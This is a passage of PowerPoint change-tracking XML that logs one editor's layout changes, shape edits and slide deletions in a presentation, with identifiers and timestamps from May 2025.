        <pc:spChg chg="mod ord">
          <ac:chgData name="Dražen Pranić" userId="3012855b-bf2d-4e7c-804b-71a5f3d907b3" providerId="ADAL" clId="{6294CC6F-7049-4850-A6F7-B103CDA45901}" dt="2025-05-12T19:32:29.284" v="5" actId="700"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="0" sldId="387"/>
            <ac:spMk id="61442" creationId="{00000000-0000-0000-0000-000000000000}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="mod ord">
          <ac:chgData name="Dražen Pranić" userId="3012855b-bf2d-4e7c-804b-71a5f3d907b3" providerId="ADAL" clId="{6294CC6F-7049-4850-A6F7-B103CDA45901}" dt="2025-05-12T19:32:29.284" v="5" actId="700"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="0" sldId="387"/>
            <ac:spMk id="61443" creationId="{00000000-0000-0000-0000-000000000000}"/>
          </ac:spMkLst>
        </pc:spChg>
      </pc:sldChg>
      <pc:sldChg chg="del">
        <pc:chgData name="Dražen Pranić" userId="3012855b-bf2d-4e7c-804b-71a5f3d907b3" providerId="ADAL" clId="{6294CC6F-7049-4850-A6F7-B103CDA45901}" dt="2025-05-12T19:32:10.012" v="3" actId="47"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="0" sldId="388"/>
        </pc:sldMkLst>
      </pc:sldChg>
      <pc:sldChg chg="modSp mod modClrScheme chgLayout">
        <pc:chgData name="Dražen Pranić" userId="3012855b-bf2d-4e7c-804b-71a5f3d907b3" providerId="ADAL" clId="{6294CC6F-7049-4850-A6F7-B103CDA45901}" dt="2025-05-12T19:32:29.284" v="5" actId="700"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="3220517305" sldId="394"/>
        </pc:sldMkLst>
        <pc:spChg chg="mod ord">
          <ac:chgData name="Dražen Pranić" userId="3012855b-bf2d-4e7c-804b-71a5f3d907b3" providerId="ADAL" clId="{6294CC6F-7049-4850-A6F7-B103CDA45901}" dt="2025-05-12T19:32:29.284" v="5" actId="700"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="3220517305" sldId="394"/>
            <ac:spMk id="4" creationId="{00000000-0000-0000-0000-000000000000}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="mod ord">
          <ac:chgData name="Dražen Pranić" userId="3012855b-bf2d-4e7c-804b-71a5f3d907b3" providerId="ADAL" clId="{6294CC6F-7049-4850-A6F7-B103CDA45901}" dt="2025-05-12T19:32:29.284" v="5" actId="700"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="3220517305" sldId="394"/>
            <ac:spMk id="26626" creationId="{00000000-0000-0000-0000-000000000000}"/>
          </ac:spMkLst>
        </pc:spChg>
      </pc:sldChg>
      <pc:sldChg chg="modSp del mod modClrScheme chgLayout">
        <pc:chgData name="Dražen Pranić" userId="3012855b-bf2d-4e7c-804b-71a5f3d907b3" providerId="ADAL" clId="{6294CC6F-7049-4850-A6F7-B103CDA45901}" dt="2025-05-13T09:51:55.499" v="111" actId="47"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="490708115" sldId="401"/>
        </pc:sldMkLst>
        <pc:spChg chg="mod ord">
          <ac:chgData name="Dražen Pranić" userId="3012855b-bf2d-4e7c-804b-71a5f3d907b3" providerId="ADAL" clId="{6294CC6F-7049-4850-A6F7-B103CDA45901}" dt="2025-05-12T19:32:29.284" v="5" actId="700"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="490708115" sldId="401"/>
            <ac:spMk id="5" creationId="{00000000-0000-0000-0000-000000000000}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="mod ord">
          <ac:chgData name="Dražen Pranić" userId="3012855b-bf2d-4e7c-804b-71a5f3d907b3" providerId="ADAL" clId="{6294CC6F-7049-4850-A6F7-B103CDA45901}" dt="2025-05-12T19:32:29.284" v="5" actId="700"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="490708115" sldId="401"/>
            <ac:spMk id="6"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3623887255" sldId="403"/>
        </pc:sldMkLst>
        <pc:spChg chg="mod ord">
          <ac:chgData name="Dražen Pranić" userId="3012855b-bf2d-4e7c-804b-71a5f3d907b3" providerId="ADAL" clId="{6294CC6F-7049-4850-A6F7-B103CDA45901}" dt="2025-05-12T19:32:29.284" v="5" actId="700"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="3623887255" sldId="403"/>
            <ac:spMk id="2" creationId="{00000000-0000-0000-0000-000000000000}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="mod ord">
          <ac:chgData name="Dražen Pranić" userId="3012855b-bf2d-4e7c-804b-71a5f3d907b3" providerId="ADAL" clId="{6294CC6F-7049-4850-A6F7-B103CDA45901}" dt="2025-05-12T19:32:29.284" v="5" actId="700"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="3623887255" sldId="403"/>
            <ac:spMk id="51203" creationId="{00000000-0000-0000-0000-000000000000}"/>
          </ac:spMkLst>
        </pc:spChg>
      </pc:sldChg>
      <pc:sldChg chg="modSp mod modClrScheme chgLayout">
        <pc:chgData name="Dražen Pranić" userId="3012855b-bf2d-4e7c-804b-71a5f3d907b3" providerId="ADAL" clId="{6294CC6F-7049-4850-A6F7-B103CDA45901}" dt="2025-05-12T19:32:29.284" v="5" actId="700"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="2267985346" sldId="404"/>
        </pc:sldMkLst>
        <pc:spChg chg="mod ord">
          <ac:chgData name="Dražen Pranić" userId="3012855b-bf2d-4e7c-804b-71a5f3d907b3" providerId="ADAL" clId="{6294CC6F-7049-4850-A6F7-B103CDA45901}" dt="2025-05-12T19:32:29.284" v="5" actId="700"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="2267985346" sldId="404"/>
            <ac:spMk id="5" creationId="{77A7418C-19B4-44ED-9887-AE98DC1DB2F6}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="mod ord">
          <ac:chgData name="Dražen Pranić" userId="3012855b-bf2d-4e7c-804b-71a5f3d907b3" providerId="ADAL" clId="{6294CC6F-7049-4850-A6F7-B103CDA45901}" dt="2025-05-12T19:32:29.284" v="5" actId="700"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="2267985346" sldId="404"/>
            <ac:spMk id="6" creationId="{4930A752-5D36-4162-A43C-C67D3D1A4D72}"/>
          </ac:spMkLst>
        </pc:spChg>
      </pc:sldChg>
      <pc:sldChg chg="addSp delSp modSp mod modClrScheme chgLayout">
        <pc:chgData name="Dražen Pranić" userId="3012855b-bf2d-4e7c-804b-71a5f3d907b3" providerId="ADAL" clId="{6294CC6F-7049-4850-A6F7-B103CDA45901}" dt="2025-05-12T19:32:29.284" v="5" actId="700"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="3778269942" sldId="405"/>
        </pc:sldMkLst>
        <pc:spChg chg="del mod ord">
          <ac:chgData name="Dražen Pranić" userId="3012855b-bf2d-4e7c-804b-71a5f3d907b3" providerId="ADAL" clId="{6294CC6F-7049-4850-A6F7-B103CDA45901}" dt="2025-05-12T19:32:29.284" v="5" actId="700"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="3778269942" sldId="405"/>
            <ac:spMk id="2" creationId="{12D20BD4-604B-445E-887D-F31F094C8D8C}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="del mod ord">
          <ac:chgData name="Dražen Pranić" userId="3012855b-bf2d-4e7c-804b-71a5f3d907b3" providerId="ADAL" clId="{6294CC6F-7049-4850-A6F7-B103CDA45901}" dt="2025-05-12T19:32:29.284" v="5" actId="700"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="3778269942" sldId="405"/>
            <ac:spMk id="3" creationId="{6895A06F-2E29-4C76-95C6-B9E066450EC6}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="add mod ord">
          <ac:chgData name="Dražen Pranić" userId="3012855b-bf2d-4e7c-804b-71a5f3d907b3" providerId="ADAL" clId="{6294CC6F-7049-4850-A6F7-B103CDA45901}" dt="2025-05-12T19:32:29.284" v="5" actId="700"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="3778269942" sldId="405"/>
            <ac:spMk id="4" creationId="{128DD559-A01F-AB54-D103-394F760C5906}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="add mod ord">
          <ac:chgData name="Dražen Pranić" userId="3012855b-bf2d-4e7c-804b-71a5f3d907b3" providerId="ADAL" clId="{6294CC6F-7049-4850-A6F7-B103CDA45901}" dt="2025-05-12T19:32:29.284" v="5" actId="700"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="3778269942" sldId="405"/>
            <ac:spMk id="5" creationId="{B0298EFD-1B00-4236-C6E2-569C5ED6342D}"/>
          </ac:spMkLst>
        </pc:spChg>
      </pc:sldChg>
      <pc:sldChg chg="addSp delSp modSp mod modClrScheme chgLayout">
        <pc:chgData name="Dražen Pranić" userId="3012855b-bf2d-4e7c-804b-71a5f3d907b3" providerId="ADAL" clId="{6294CC6F-7049-4850-A6F7-B103CDA45901}" dt="2025-05-13T09:47:34.256" v="110" actId="478"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="794778083" sldId="408"/>
        </pc:sldMkLst>
        <pc:spChg chg="mod">
          <ac:chgData name="Dražen Pranić" userId="3012855b-bf2d-4e7c-804b-71a5f3d907b3" providerId="ADAL" clId="{6294CC6F-7049-4850-A6F7-B103CDA45901}" dt="2025-05-13T09:47:31.728" v="109" actId="1076"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="794778083" sldId="408"/>
            <ac:spMk id="2" creationId="{CA4A998F-06B5-4F62-883E-ED69E5CBD32B}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="add del mod ord">
          <ac:chgData name="Dražen Pranić" userId="3012855b-bf2d-4e7c-804b-71a5f3d907b3" providerId="ADAL" clId="{6294CC6F-7049-4850-A6F7-B103CDA45901}" dt="2025-05-13T09:47:34.256" v="110" actId="478"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="794778083" sldId="408"/>
            <ac:spMk id="3" creationId="{C23353D9-14DD-4EAE-735A-C2C5FDB6FD73}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:picChg chg="mod ord">
          <ac:chgData name="Dražen Pranić" userId="3012855b-bf2d-4e7c-804b-71a5f3d907b3" providerId="ADAL" clId="{6294CC6F-7049-4850-A6F7-B103CDA45901}" dt="2025-05-12T19:32:29.284" v="5" actId="700"/>
          <ac:picMkLst>
            <pc:docMk/>
            <pc:sldMk cId="794778083" sldId="408"/>
            <ac:picMk id="7" creationId="{76477ADB-DF6C-4667-AD3A-0EA74C05974A}"/>
          </ac:picMkLst>
        </pc:picChg>
      </pc:sldChg>
      <pc:sldChg chg="modSp mod modClrScheme chgLayout">
        <pc:chgData name="Dražen Pranić" userId="3012855b-bf2d-4e7c-804b-71a5f3d907b3" providerId="ADAL" clId="{6294CC6F-7049-4850-A6F7-B103CDA45901}" dt="2025-05-12T19:32:29.284" v="5" actId="700"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="1976138690" sldId="409"/>
        </pc:sldMkLst>
        <pc:spChg chg="mod ord">
          <ac:chgData name="Dražen Pranić" userId="3012855b-bf2d-4e7c-804b-71a5f3d907b3" providerId="ADAL" clId="{6294CC6F-7049-4850-A6F7-B103CDA45901}" dt="2025-05-12T19:32:29.284" v="5" actId="700"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="1976138690" sldId="409"/>
            <ac:spMk id="2" creationId="{23DBAC0F-7361-4CF4-92E9-C5C0C3E9EA90}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="mod ord">
          <ac:chgData name="Dražen Pranić" userId="3012855b-bf2d-4e7c-804b-71a5f3d907b3" providerId="ADAL" clId="{6294CC6F-7049-4850-A6F7-B103CDA45901}" dt="2025-05-12T19:32:29.284" v="5" actId="700"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="1976138690" sldId="409"/>
            <ac:spMk id="3" creationId="{96BB0A22-E49E-4038-8882-DC90D8DC67CC}"/>
          </ac:spMkLst>
        </pc:spChg>
      </pc:sldChg>
      <pc:sldChg chg="modSp mod modClrScheme chgLayout">
        <pc:chgData name="Dražen Pranić" userId="3012855b-bf2d-4e7c-804b-71a5f3d907b3" providerId="ADAL" clId="{6294CC6F-7049-4850-A6F7-B103CDA45901}" dt="2025-05-12T19:32:29.284" v="5" actId="700"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="1057937046" sldId="411"/>
        </pc:sldMkLst>
        <pc:spChg chg="mod ord">
          <ac:chgData name="Dražen Pranić" userId="3012855b-bf2d-4e7c-804b-71a5f3d907b3" providerId="ADAL" clId="{6294CC6F-7049-4850-A6F7-B103CDA45901}" dt="2025-05-12T19:32:29.284" v="5" actId="700"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="1057937046" sldId="411"/>
            <ac:spMk id="2" creationId="{63C3A3AA-4994-46A8-B1E3-BBFED2FD4C03}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="mod ord">
          <ac:chgData name="Dražen Pranić" userId="3012855b-bf2d-4e7c-804b-71a5f3d907b3" providerId="ADAL" clId="{6294CC6F-7049-4850-A6F7-B103CDA45901}" dt="2025-05-12T19:32:29.284" v="5" actId="700"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="1057937046" sldId="411"/>
            <ac:spMk id="3" creationId="{417A9C46-48AF-41EB-9D72-0C06B52AD0A9}"/>
          </ac:spMkLst>
        </pc:spChg>
      </pc:sldChg>
      <pc:sldChg chg="addSp modSp mod modClrScheme chgLayout">
        <pc:chgData name="Dražen Pranić" userId="3012855b-bf2d-4e7c-804b-71a5f3d907b3" providerId="ADAL" clId="{6294CC6F-7049-4850-A6F7-B103CDA45901}" dt="2025-05-12T19:32:29.284" v="5" actId="700"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="4283277797" sldId="412"/>
        </pc:sldMkLst>
        <pc:spChg chg="add mod ord">
          <ac:chgData name="Dražen Pranić" userId="3012855b-bf2d-4e7c-804b-71a5f3d907b3" providerId="ADAL" clId="{6294CC6F-7049-4850-A6F7-B103CDA45901}" dt="2025-05-12T19:32:29.284" v="5" actId="700"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="4283277797" sldId="412"/>
            <ac:spMk id="2" creationId="{53837C95-1857-879D-2858-39C2094DE741}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:picChg chg="mod ord">
          <ac:chgData name="Dražen Pranić" userId="3012855b-bf2d-4e7c-804b-71a5f3d907b3" providerId="ADAL" clId="{6294CC6F-7049-4850-A6F7-B103CDA45901}" dt="2025-05-12T19:32:29.284" v="5" actId="700"/>
          <ac:picMkLst>
            <pc:docMk/>
            <pc:sldMk cId="4283277797" sldId="412"/>
            <ac:picMk id="1031" creationId="{8C4F88BC-04D5-4BFC-8416-30D927CFA4DE}"/>
          </ac:picMkLst>
        </pc:picChg>
      </pc:sldChg>
      <pc:sldChg chg="addSp delSp modSp add del mod modClrScheme chgLayout">
        <pc:chgData name="Dražen Pranić" userId="3012855b-bf2d-4e7c-804b-71a5f3d907b3" providerId="ADAL" clId="{6294CC6F-7049-4850-A6F7-B103CDA45901}" dt="2025-05-13T09:47:16.532" v="108" actId="47"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="3427952739" sldId="413"/>
        </pc:sldMkLst>
        <pc:spChg chg="add mod ord">
          <ac:chgData name="Dražen Pranić" userId="3012855b-bf2d-4e7c-804b-71a5f3d907b3" providerId="ADAL" clId="{6294CC6F-7049-4850-A6F7-B103CDA45901}" dt="2025-05-12T19:32:29.284" v="5" actId="700"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="3427952739" sldId="413"/>
            <ac:spMk id="2" creationId="{E21ABAD3-7C11-8C9B-D561-828F469FCA40}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="add mod">
          <ac:chgData name="Dražen Pranić" userId="3012855b-bf2d-4e7c-804b-71a5f3d907b3" providerId="ADAL" clId="{6294CC6F-7049-4850-A6F7-B103CDA45901}" dt="2025-05-13T09:47:14.184" v="107" actId="478"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="3427952739" sldId="413"/>
            <ac:spMk id="3" creationId="{8EC48D5B-0EF8-E235-4B7F-A7828C8FEECB}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:picChg chg="del mod ord">
          <ac:chgData name="Dražen Pranić" userId="3012855b-bf2d-4e7c-804b-71a5f3d907b3" providerId="ADAL" clId="{6294CC6F-7049-4850-A6F7-B103CDA45901}" dt="2025-05-13T09:47:14.184" v="107" actId="478"/>
          <ac:picMkLst>
            <pc:docMk/>
            <pc:sldMk cId="3427952739" sldId="413"/>
            <ac:picMk id="2053" creationId="{5B71E0D3-6903-443A-B86F-A78FDAA7944C}"/>
          </ac:picMkLst>
        </pc:picChg>
      </pc:sldChg>
      <pc:sldChg chg="addSp modSp mod modClrScheme chgLayout">
        <pc:chgData name="Dražen Pranić" userId="3012855b-bf2d-4e7c-804b-71a5f3d907b3" providerId="ADAL" clId="{6294CC6F-7049-4850-A6F7-B103CDA45901}" dt="2025-05-12T19:32:29.284" v="5" actId="700"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="2038032524" sldId="414"/>
        </pc:sldMkLst>
        <pc:spChg chg="add mod ord">
          <ac:chgData name="Dražen Pranić" userId="3012855b-bf2d-4e7c-804b-71a5f3d907b3" providerId="ADAL" clId="{6294CC6F-7049-4850-A6F7-B103CDA45901}" dt="2025-05-12T19:32:29.284" v="5" actId="700"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="2038032524" sldId="414"/>
            <ac:spMk id="2" creationId="{01D2A90D-824E-7A82-1620-BEAB8C334C31}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:picChg chg="mod ord">
          <ac:chgData name="Dražen Pranić" userId="3012855b-bf2d-4e7c-804b-71a5f3d907b3" providerId="ADAL" clId="{6294CC6F-7049-4850-A6F7-B103CDA45901}" dt="2025-05-12T19:32:29.284" v="5" actId="700"/>
          <ac:picMkLst>
            <pc:docMk/>
            <pc:sldMk cId="2038032524" sldId="414"/>
            <ac:picMk id="7" creationId="{5A7E895F-0F6B-4A7F-A77E-793790EB9717}"/>
          </ac:picMkLst>
        </pc:picChg>
      </pc:sldChg>
      <pc:sldChg chg="modSp mod modClrScheme chgLayout">
        <pc:chgData name="Dražen Pranić" userId="3012855b-bf2d-4e7c-804b-71a5f3d907b3" providerId="ADAL" clId="{6294CC6F-7049-4850-A6F7-B103CDA45901}" dt="2025-05-12T19:32:29.284" v="5" actId="700"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="2163945288" sldId="423"/>
        </pc:sldMkLst>
        <pc:spChg chg="mod ord">
          <ac:chgData name="Dražen Pranić" userId="3012855b-bf2d-4e7c-804b-71a5f3d907b3" providerId="ADAL" clId="{6294CC6F-7049-4850-A6F7-B103CDA45901}" dt="2025-05-12T19:32:29.284" v="5" actId="700"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="2163945288" sldId="423"/>
            <ac:spMk id="2" creationId="{F929BAAE-3A93-4994-BF81-E358F55F223E}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="mod ord">
          <ac:chgData name="Dražen Pranić" userId="3012855b-bf2d-4e7c-804b-71a5f3d907b3" providerId="ADAL" clId="{6294CC6F-7049-4850-A6F7-B103CDA45901}" dt="2025-05-12T19:32:29.284" v="5" actId="700"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="2163945288" sldId="423"/>
            <ac:spMk id="3" creationId="{A91A69B8-4B0B-4EA4-9801-AF711FD4A140}"/>
          </ac:spMkLst>
        </pc:spChg>
      </pc:sldChg>
      <pc:sldChg chg="modSp mod modClrScheme chgLayout">
        <pc:chgData name="Dražen Pranić" userId="3012855b-bf2d-4e7c-804b-71a5f3d907b3" providerId="ADAL" clId="{6294CC6F-7049-4850-A6F7-B103CDA45901}" dt="2025-05-12T19:32:29.284" v="5" actId="700"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="2754075144" sldId="426"/>
        </pc:sldMkLst>
        <pc:spChg chg="mod ord">
          <ac:chgData name="Dražen Pranić" userId="3012855b-bf2d-4e7c-804b-71a5f3d907b3" providerId="ADAL" clId="{6294CC6F-7049-4850-A6F7-B103CDA45901}" dt="2025-05-12T19:32:29.284" v="5" actId="700"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="2754075144" sldId="426"/>
            <ac:spMk id="2" creationId="{20EAC488-F1FF-4982-9F00-5A2D74A217F1}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="mod ord">
          <ac:chgData name="Dražen Pranić" userId="3012855b-bf2d-4e7c-804b-71a5f3d907b3" providerId="ADAL" clId="{6294CC6F-7049-4850-A6F7-B103CDA45901}" dt="2025-05-12T19:32:29.284" v="5" actId="700"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="2754075144" sldId="426"/>
            <ac:spMk id="3" creationId="{18AF1A95-BC42-4217-9149-6BD54912027F}"/>
          </ac:spMkLst>
        </pc:spChg>
      </pc:sldChg>
      <pc:sldChg chg="modSp mod modClrScheme chgLayout">
        <pc:chgData name="Dražen Pranić" userId="3012855b-bf2d-4e7c-804b-71a5f3d907b3" providerId="ADAL" clId="{6294CC6F-7049-4850-A6F7-B103CDA45901}" dt="2025-05-13T09:54:11.761" v="115" actId="14100"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="2952186356" sldId="427"/>
        </pc:sldMkLst>
        <pc:spChg chg="mod ord">
          <ac:chgData name="Dražen Pranić" userId="3012855b-bf2d-4e7c-804b-71a5f3d907b3" providerId="ADAL" clId="{6294CC6F-7049-4850-A6F7-B103CDA45901}" dt="2025-05-12T19:32:29.284" v="5" actId="700"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="2952186356" sldId="427"/>
            <ac:spMk id="2" creationId="{832E552D-86C1-41BE-B892-4F8D8C95FA01}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:picChg chg="mod ord">
          <ac:chgData name="Dražen Pranić" userId="3012855b-bf2d-4e7c-804b-71a5f3d907b3" providerId="ADAL" clId="{6294CC6F-7049-4850-A6F7-B103CDA45901}" dt="2025-05-13T09:54:11.761" v="115" actId="14100"/>
          <ac:picMkLst>
            <pc:docMk/>
            <pc:sldMk cId="2952186356" sldId="427"/>
            <ac:picMk id="1026" creationId="{C0F77216-D126-4D79-9247-E67C7AB3B013}"/>
          </ac:picMkLst>
        </pc:picChg>
      </pc:sldChg>
      <pc:sldChg chg="modSp mod modClrScheme chgLayout">
        <pc:chgData name="Dražen Pranić" userId="3012855b-bf2d-4e7c-804b-71a5f3d907b3" providerId="ADAL" clId="{6294CC6F-7049-4850-A6F7-B103CDA45901}" dt="2025-05-12T19:32:29.284" v="5" actId="700"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="1655540205" sldId="428"/>
        </pc:sldMkLst>
        <pc:spChg chg="mod ord">
          <ac:chgData name="Dražen Pranić" userId="3012855b-bf2d-4e7c-804b-71a5f3d907b3" providerId="ADAL" clId="{6294CC6F-7049-4850-A6F7-B103CDA45901}" dt="2025-05-12T19:32:29.284" v="5" actId="700"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="1655540205" sldId="428"/>
            <ac:spMk id="2" creationId="{611756CE-FAF1-428D-8562-50A3AAFB8312}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="mod ord">
          <ac:chgData name="Dražen Pranić" userId="3012855b-bf2d-4e7c-804b-71a5f3d907b3" providerId="ADAL" clId="{6294CC6F-7049-4850-A6F7-B103CDA45901}" dt="2025-05-12T19:32:29.284" v="5" actId="700"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="1655540205" sldId="428"/>
            <ac:spMk id="3" creationId="{5E362361-550D-446D-9385-6A2E43E55629}"/>
          </ac:spMkLst>
        </pc:spChg>
      </pc:sldChg>
      <pc:sldChg chg="modSp mod modClrScheme chgLayout">
        <pc:chgData name="Dražen Pranić" userId="3012855b-bf2d-4e7c-804b-71a5f3d907b3" providerId="ADAL" clId="{6294CC6F-7049-4850-A6F7-B103CDA45901}" dt="2025-05-13T10:54:36.709" v="244" actId="20577"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="3998721682" sldId="429"/>
        </pc:sldMkLst>
        <pc:spChg chg="mod ord">
          <ac:chgData name="Dražen Pranić" userId="3012855b-bf2d-4e7c-804b-71a5f3d907b3" providerId="ADAL" clId="{6294CC6F-7049-4850-A6F7-B103CDA45901}" dt="2025-05-12T19:32:29.284" v="5" actId="700"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="3998721682" sldId="429"/>
            <ac:spMk id="2" creationId="{2CE802AD-3F74-41D4-A012-E04F4AE75C63}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="mod ord">
          <ac:chgData name="Dražen Pranić" userId="3012855b-bf2d-4e7c-804b-71a5f3d907b3" providerId="ADAL" clId="{6294CC6F-7049-4850-A6F7-B103CDA45901}" dt="2025-05-13T10:54:36.709" v="244" actId="20577"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="3998721682" sldId="429"/>
            <ac:spMk id="3" creationId="{11760384-1794-49A3-B7F5-80D114C37DDD}"/>
          </ac:spMkLst>
        </pc:spChg>
      </pc:sldChg>
      <pc:sldChg chg="add">
        <pc:chgData name="Dražen Pranić" userId="3012855b-bf2d-4e7c-804b-71a5f3d907b3" providerId="ADAL" clId="{6294CC6F-7049-4850-A6F7-B103CDA45901}" dt="2025-05-12T19:59:35.119" v="73"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="131923761" sldId="430"/>
        </pc:sldMkLst>
      </pc:sldChg>
      <pc:sldChg chg="add del">
        <pc:chgData name="Dražen Pranić" userId="3012855b-bf2d-4e7c-804b-71a5f3d907b3" providerId="ADAL" clId="{6294CC6F-7049-4850-A6F7-B103CDA45901}" dt="2025-05-12T19:59:21.444" v="72" actId="2696"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="2700832723" sldId="430"/>
        </pc:sldMkLst>
      </pc:sldChg>
      <pc:sldChg chg="addSp delSp modSp del mod modClrScheme chgLayout">
        <pc:chgData name="Dražen Pranić" userId="3012855b-bf2d-4e7c-804b-71a5f3d907b3" providerId="ADAL" clId="{6294CC6F-7049-4850-A6F7-B103CDA45901}" dt="2025-05-12T19:58:20.854" v="70" actId="2696"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="4127335975" sldId="430"/>
        </pc:sldMkLst>
        <pc:spChg chg="mod ord">
          <ac:chgData name="Dražen Pranić" userId="3012855b-bf2d-4e7c-804b-71a5f3d907b3" providerId="ADAL" clId="{6294CC6F-7049-4850-A6F7-B103CDA45901}" dt="2025-05-12T19:32:29.284" v="5" actId="700"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="4127335975" sldId="430"/>
            <ac:spMk id="2" creationId="{D4AC6742-E74C-427A-A79D-CFA8DB5B6AE1}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="del mod ord">
          <ac:chgData name="Dražen Pranić" userId="3012855b-bf2d-4e7c-804b-71a5f3d907b3" providerId="ADAL" clId="{6294CC6F-7049-4850-A6F7-B103CDA45901}" dt="2025-05-12T19:32:29.284" v="5" actId="700"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="4127335975" sldId="430"/>
            <ac:spMk id="3" creationId="{618A97C6-704A-44E8-9BF8-F90C3A510D94}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="add mod ord">
          <ac:chgData name="Dražen Pranić" userId="3012855b-bf2d-4e7c-804b-71a5f3d907b3" providerId="ADAL" clId="{6294CC6F-7049-4850-A6F7-B103CDA45901}" dt="2025-05-12T19:32:29.284" v="5" actId="700"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="4127335975" sldId="430"/>
            <ac:spMk id="4" creationId="{C80E9BC6-CAE9-9B2F-2D4C-9C8021E5D2D2}"/>
          </ac:spMkLst>
        </pc:spChg>
      </pc:sldChg>
      <pc:sldChg chg="addSp delSp modSp del mod modClrScheme chgLayout">
        <pc:chgData name="Dražen Pranić" userId="3012855b-bf2d-4e7c-804b-71a5f3d907b3" providerId="ADAL" clId="{6294CC6F-7049-4850-A6F7-B103CDA45901}" dt="2025-05-12T19:57:04.712" v="68" actId="2696"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="2268374611" sldId="431"/>
        </pc:sldMkLst>
        <pc:spChg chg="add del mod ord">
